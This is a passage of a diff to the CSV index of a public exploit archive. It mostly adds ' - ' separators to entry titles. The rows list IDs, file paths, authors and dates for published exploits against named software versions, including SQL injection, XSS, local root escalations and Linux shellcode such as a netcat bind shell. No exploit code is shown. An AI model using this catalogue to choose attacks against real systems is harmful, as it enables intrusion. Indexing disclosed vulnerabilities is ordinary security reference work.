Vulnerabilities",2012-04-16,"Aung Khant",php,webapps,0 37084,platforms/cgi/webapps/37084.txt,"Munin 2.0~rc4-1 Remote Command Injection",2012-04-13,"Helmut Grohne",cgi,webapps,0 -37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 'plug.php' SQL Injection",2012-04-15,AkaStep,php,webapps,0 +37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 - 'plug.php' SQL Injection",2012-04-15,AkaStep,php,webapps,0 37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0 -37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 'login' Field HTML Injection",2012-04-17,"Marcos Garcia",php,webapps,0 +37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' Field HTML Injection",2012-04-17,"Marcos Garcia",php,webapps,0 37088,platforms/linux/local/37088.c,"Apport/Ubuntu - Local Root Race Condition",2015-05-23,rebel,linux,local,0 37089,platforms/linux/local/37089.txt,"Fuse 2.9.3-15 - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0 37090,platforms/php/webapps/37090.txt,"Joomla! JA T3 Framework Component Directory Traversal",2012-04-17,indoushka,php,webapps,0 -37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 'UserName' Parameter Cross Site Scripting",2012-04-17,"Aung Khant",php,webapps,0 -37092,platforms/php/webapps/37092.txt,"XOOPS 2.5.4 /modules/pm/pmlite.php to_userid Parameter XSS",2012-04-18,"High-Tech Bridge SA",php,webapps,0 -37093,platforms/php/webapps/37093.txt,"XOOPS 2.5.4 /tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php Multiple Parameter XSS",2012-04-18,"High-Tech Bridge SA",php,webapps,0 +37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 - 'UserName' Parameter Cross Site Scripting",2012-04-17,"Aung Khant",php,webapps,0 +37092,platforms/php/webapps/37092.txt,"XOOPS 2.5.4 - /modules/pm/pmlite.php to_userid Parameter XSS",2012-04-18,"High-Tech Bridge SA",php,webapps,0 +37093,platforms/php/webapps/37093.txt,"XOOPS 2.5.4 - /tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php Multiple Parameter XSS",2012-04-18,"High-Tech Bridge SA",php,webapps,0 37094,platforms/php/webapps/37094.txt,"ownCloud 3.0.0 index.php redirect_url Parameter Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps,0 -37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 'username' Parameter Cross Site Scripting",2012-04-20,sonyy,php,webapps,0 +37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - 'username' Parameter Cross Site Scripting",2012-04-20,sonyy,php,webapps,0 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0 @@ -33486,10 +33486,10 @@ id,file,description,date,author,platform,type,port 37254,platforms/php/webapps/37254.txt,"WordPress History Collection <= 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0 37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0 -37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0 +37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0 37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0 37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 Information Disclosure_ SQL Injection and Cross Site Scripting Vulnerabilities",2012-04-26,"Jakub Galczyk",php,webapps,0 -37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 'jsoncallback' Parameter Cross Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 +37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37106,platforms/php/webapps/37106.txt,"WordPress Video Gallery Plugin 2.8 Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80 37107,platforms/php/webapps/37107.txt,"WordPress NewStatPress Plugin 0.9.8 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 @@ -33503,13 +33503,13 @@ id,file,description,date,author,platform,type,port 37115,platforms/perl/webapps/37115.txt,"Clickheat 1.13+ Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0 37116,platforms/php/webapps/37116.py,"SilverStripe 2.4.7 install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0 37117,platforms/perl/webapps/37117.txt,"Croogo CMS 1.3.4 Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben Achor",perl,webapps,0 -37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 'encode' Parameter Cross Site Scripting",2012-04-27,farbodmahini,php,webapps,0 +37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' Parameter Cross Site Scripting",2012-04-27,farbodmahini,php,webapps,0 37119,platforms/asp/webapps/37119.txt,"XM Forum 'id' Parameter Multiple SQL Injection Vulnerabilities",2012-04-27,"Farbod Mahini",asp,webapps,0 37120,platforms/php/webapps/37120.txt,"Uiga FanClub 'p' Parameter SQL Injection",2012-04-27,"Farbod Mahini",php,webapps,0 37121,platforms/asp/webapps/37121.txt,"BBSXP CMS Multiple SQL Injection Vulnerabilities",2012-04-27,"Farbod Mahini",asp,webapps,0 -37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 'id' Parameter SQL Injection",2012-04-28,eidelweiss,php,webapps,0 +37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 - 'id' Parameter SQL Injection",2012-04-28,eidelweiss,php,webapps,0 37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting",2012-04-30,Am!r,php,webapps,0 -37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0 +37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0 37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 restore.php filename Parameter XSS",2012-04-27,AkaStep,php,webapps,0 37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0 37127,platforms/php/webapps/37127.txt,"MySQLDumper 1.24.4 install.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0 @@ -33519,48 +33519,48 @@ id,file,description,date,author,platform,type,port 37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 main.php Multiple Function CSRF",2012-04-27,AkaStep,php,webapps,0 37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 Stored XSS",2015-05-27,"Panagiotis Vagenas",php,webapps,80 37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0 -37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 'menu.php' Remote PHP Code Execution",2012-04-27,AkaStep,php,webapps,0 +37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' Remote PHP Code Execution",2012-04-27,AkaStep,php,webapps,0 37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A Cross Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps,0 -37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps,0 +37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps,0 37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection",2012-05-06,phocean,php,webapps,0 37138,platforms/php/webapps/37138.txt,"Ramui Forum Script 'query' Parameter Cross Site Scripting",2012-05-07,3spi0n,php,webapps,0 -37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 'Login_form.php' Authentication Security Bypass",2012-05-07,L3b-r1'z,php,webapps,0 -37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 'banners.php' PHP Code Injection",2012-05-08,L3b-r1'z,php,webapps,0 +37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass",2012-05-07,L3b-r1'z,php,webapps,0 +37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 - 'banners.php' PHP Code Injection",2012-05-08,L3b-r1'z,php,webapps,0 37141,platforms/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router Cross-Site Request Forgery",2012-05-08,Kalashinkov3,hardware,remote,0 37142,platforms/php/webapps/37142.txt,"OrangeHRM 2.7 RC plugins/ajaxCalls/haltResumeHsp.php hspSummaryId Parameter SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37143,platforms/php/webapps/37143.txt,"OrangeHRM 2.7 RC plugins/ajaxCalls/haltResumeHsp.php newHspStatus Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37144,platforms/php/webapps/37144.txt,"OrangeHRM 2.7 RC templates/hrfunct/emppop.php sortOrder1 Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37145,platforms/php/webapps/37145.txt,"OrangeHRM 2.7 RC index.php uri Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0 -37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 'ajaxhelper.php' Cross Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 +37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 Upload/engine.php v Parameter XSS",2012-05-10,AkaStep,php,webapps,0 37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22 -37197,platforms/windows/local/37197.py,"Jildi FTP Client 1.5.6 (SEH) BOF",2015-06-04,"Zahid Adeel",windows,local,0 +37197,platforms/windows/local/37197.py,"Jildi FTP Client 1.5.6 - (SEH) BOF",2015-06-04,"Zahid Adeel",windows,local,0 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 -37170,platforms/hardware/remote/37170.rb,"Airties login-cgi Buffer Overflow",2015-06-01,metasploit,hardware,remote,0 +37170,platforms/hardware/remote/37170.rb,"Airties login-cgi Buffer Overflow",2015-06-01,Metasploit,hardware,remote,0 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 -37155,platforms/php/webapps/37155.txt,"WordPress WP-FaceThumb 0.1 'pagination_wp_facethum' Parameter Cross Site Scripting",2012-05-13,d3v1l,php,webapps,0 +37155,platforms/php/webapps/37155.txt,"WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross Site Scripting",2012-05-13,d3v1l,php,webapps,0 37156,platforms/php/webapps/37156.txt,"GetSimple CMS 3.1 admin/theme.php err Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 37157,platforms/php/webapps/37157.txt,"GetSimple CMS 3.1 admin/pages.php error Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 37158,platforms/php/webapps/37158.txt,"GetSimple CMS 3.1 admin/index.php Multiple Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 37159,platforms/php/webapps/37159.txt,"GetSimple CMS 3.1 admin/upload.php path Parameter XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 - 'uread.exe' Denial Of Service",2012-05-14,demonalex,windows,dos,0 -37161,platforms/php/webapps/37161.txt,"WordPress GRAND Flash Album Gallery 1.71 'admin.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 'themes.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37161,platforms/php/webapps/37161.txt,"WordPress GRAND Flash Album Gallery 1.71 - 'admin.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0 37165,platforms/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Buffer OverFlow PoC",2015-06-01,metacom,windows,remote,0 37166,platforms/php/webapps/37166.php,"WordPress dzs-zoomsounds Plugins <= 2.0 - Remote File Upload",2015-06-01,"nabil chris",php,webapps,0 37167,platforms/linux/local/37167.c,"PonyOS <= 3.0 - VFS Permissions Exploit",2015-06-01,"Hacker Fantastic",linux,local,0 37168,platforms/linux/local/37168.txt,"PonyOS <= 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0 -37171,platforms/hardware/remote/37171.rb,"D-Link Devices HNAP SOAPAction-Header Command Execution",2015-06-01,metasploit,hardware,remote,0 +37171,platforms/hardware/remote/37171.rb,"D-Link Devices HNAP SOAPAction-Header Command Execution",2015-06-01,Metasploit,hardware,remote,0 37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager Stored XSS",2015-06-01,"Cristiano Maruti",hardware,webapps,0 -37173,platforms/php/webapps/37173.txt,"Download Monitor 3.3.5.4 'uploader.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37174,platforms/php/webapps/37174.txt,"WordPress Network Publisher 5.0.1 'networkpub_key' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37175,platforms/php/webapps/37175.txt,"Download Manager 2.2.2 'cid' Parameter Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37173,platforms/php/webapps/37173.txt,"Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37174,platforms/php/webapps/37174.txt,"WordPress Network Publisher 5.0.1 - 'networkpub_key' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37175,platforms/php/webapps/37175.txt,"Download Manager 2.2.2 - 'cid' Parameter Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37176,platforms/php/webapps/37176.txt,"PDF & Print Button Joliprint 1.3.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37177,platforms/php/webapps/37177.txt,"CataBlog WordPress Plugin 1.6 'admin.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 'main_page.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 - 'main_page.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0 37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0 @@ -33573,15 +33573,15 @@ id,file,description,date,author,platform,type,port 37191,platforms/php/webapps/37191.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress leaflet_layer.php id Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0 37192,platforms/php/webapps/37192.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress leaflet_marker.php id Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0 37193,platforms/php/webapps/37193.txt,"GD Star Rating 1.9.16 'tpl_section' Parameter Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 'admin.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 - 'admin.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37195,platforms/php/webapps/37195.txt,"WP Forum Server Plugin 1.7.3 for WordPress fs-admin/fs-admin.php Multiple Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0 37196,platforms/php/webapps/37196.txt,"Pretty Link Lite WordPress Plugin 1.5.2 SQL Injection and Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0 37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem - Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0 37200,platforms/php/webapps/37200.txt,"WordPress zM Ajax Login & Register Plugin 1.0.9 Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80 37201,platforms/php/webapps/37201.txt,"WordPress Sharebar Plugin 1.2.1 SQL Injection and Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37202,platforms/php/webapps/37202.txt,"Share and Follow 1.80.3 'admin.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37203,platforms/php/webapps/37203.txt,"WordPress Soundcloud Is Gold 2.1 'width' Parameter Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37202,platforms/php/webapps/37202.txt,"Share and Follow 1.80.3 - 'admin.php' Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37203,platforms/php/webapps/37203.txt,"WordPress Soundcloud Is Gold 2.1 - 'width' Parameter Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37204,platforms/php/webapps/37204.txt,"WordPress Track That Stat 1.0.8 Cross Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37205,platforms/php/webapps/37205.txt,"LongTail JW Player 'debug' Parameter Cross Site Scripting",2012-05-16,gainover,php,webapps,0 37206,platforms/php/webapps/37206.txt,"SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.showpic.php title Parameter XSS",2012-05-16,"Gjoko Krstic",php,webapps,0 @@ -33599,8 +33599,8 @@ id,file,description,date,author,platform,type,port 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 Cross Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye <= 2.5.7 and Crucible <= 2.5.7 Plugins XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 -37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 -37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 +37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 +37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross Site Scripting",2012-05-21,MustLive,php,webapps,0 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 37226,platforms/php/webapps/37226.txt,"concrete5 FlashUploader Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0 @@ -33611,7 +33611,7 @@ id,file,description,date,author,platform,type,port 37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin index.php id Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin admin.php Multiple Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS 'car-details.php' SQL Injection",2012-06-03,Am!r,php,webapps,0 -37353,platforms/php/webapps/37353.php,"Nmedia WordPress Member Conversation Plugin 1.35.0 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps,0 +37353,platforms/php/webapps/37353.php,"Nmedia WordPress Member Conversation Plugin 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps,0 37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQLi",2015-06-09,Pancaker,php,webapps,0 37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 @@ -33634,7 +33634,7 @@ id,file,description,date,author,platform,type,port 37304,platforms/php/webapps/37304.txt,"BlackCat CMS 1.1.1 Arbitrary File Download",2015-06-17,d4rkr0id,php,webapps,80 37305,platforms/php/webapps/37305.txt,"Plogger Photo Gallery SQL Injection",2012-05-22,"Eyup CELIK",php,webapps,0 37306,platforms/linux/dos/37306.txt,"Mosh Remote Denial of Service",2012-05-22,"Timo Juhani Lindfors",linux,dos,0 -37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 'index.php' Cross Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0 +37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0 37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x Cross Site Scripting_ Information Disclosure and Directory Traversal Vulnerabilities",2012-05-23,AkaStep,php,webapps,0 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Include",2012-05-23,AkaStep,php,webapps,0 @@ -33648,11 +33648,11 @@ id,file,description,date,author,platform,type,port 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443 37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF",2015-06-10,"RedTeam Pentesting",hardware,webapps,80 -37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 - Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0 +37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 - Mod_Copy Command Execution",2015-06-10,Metasploit,linux,remote,0 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80 37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF",2015-06-10,"Nitin Venkatesh",php,webapps,80 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0 -37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0 +37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 - (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0 37292,platforms/linux/local/37292.c,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Root Shell",2015-06-16,rebel,linux,local,0 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,php,webapps,80 @@ -33683,10 +33683,10 @@ id,file,description,date,author,platform,type,port 37296,platforms/php/webapps/37296.txt,"Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - CSRF",2015-06-16,"Jerold Hoong",php,webapps,0 37297,platforms/lin_x86/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader shellcode (58 bytes)",2015-06-16,B3mB4m,lin_x86,shellcode,0 37317,platforms/php/webapps/37317.txt,"AzDGDatingMedium 1.9.3 Multiple Remote Vulnerabilities",2012-05-27,AkaStep,php,webapps,0 -37318,platforms/php/webapps/37318.txt,"PHPList 2.10.9 'Sajax.php' PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 +37318,platforms/php/webapps/37318.txt,"PHPList 2.10.9 - 'Sajax.php' PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 37319,platforms/windows/webapps/37319.html,"Tango DropBox 3.1.5 + PRO - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0 37320,platforms/windows/webapps/37320.html,"Tango FTP 1.0 (Build 136) - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0 -37321,platforms/php/webapps/37321.txt,"DynPage 1.0 'ckfinder' Multiple Arbitrary File Upload Vulnerabilities",2012-05-25,KedAns-Dz,php,webapps,0 +37321,platforms/php/webapps/37321.txt,"DynPage 1.0 - 'ckfinder' Multiple Arbitrary File Upload Vulnerabilities",2012-05-25,KedAns-Dz,php,webapps,0 37322,platforms/multiple/webapps/37322.txt,"ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities",2015-06-19,Vulnerability-Lab,multiple,webapps,0 37323,platforms/hardware/webapps/37323.txt,"ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete",2015-06-19,Vulnerability-Lab,hardware,webapps,0 37325,platforms/multiple/webapps/37325.txt,"Lively Cart SQL Injection",2015-06-19,"Manish Tanwar",multiple,webapps,0 @@ -33696,12 +33696,12 @@ id,file,description,date,author,platform,type,port 37328,platforms/php/webapps/37328.php,"Small-Cms 'hostname' Parameter Remote PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK & chmod 777 and exit(0) shellcode (29 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Netcat BindShell Port 5555 shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 -37355,platforms/php/webapps/37355.txt,"MyBB 1.6.8 'member.php' SQL Injection",2012-06-06,MR.XpR,php,webapps,0 -37356,platforms/php/webapps/37356.txt,"WordPress Email Newsletter Plugin 8.0 'option' Parameter Information Disclosure",2012-06-07,"Sammy FORGIT",php,webapps,0 -37357,platforms/php/webapps/37357.php,"WordPress VideoWhisper Video Presentation Plugin 3.17 'vw_upload.php' 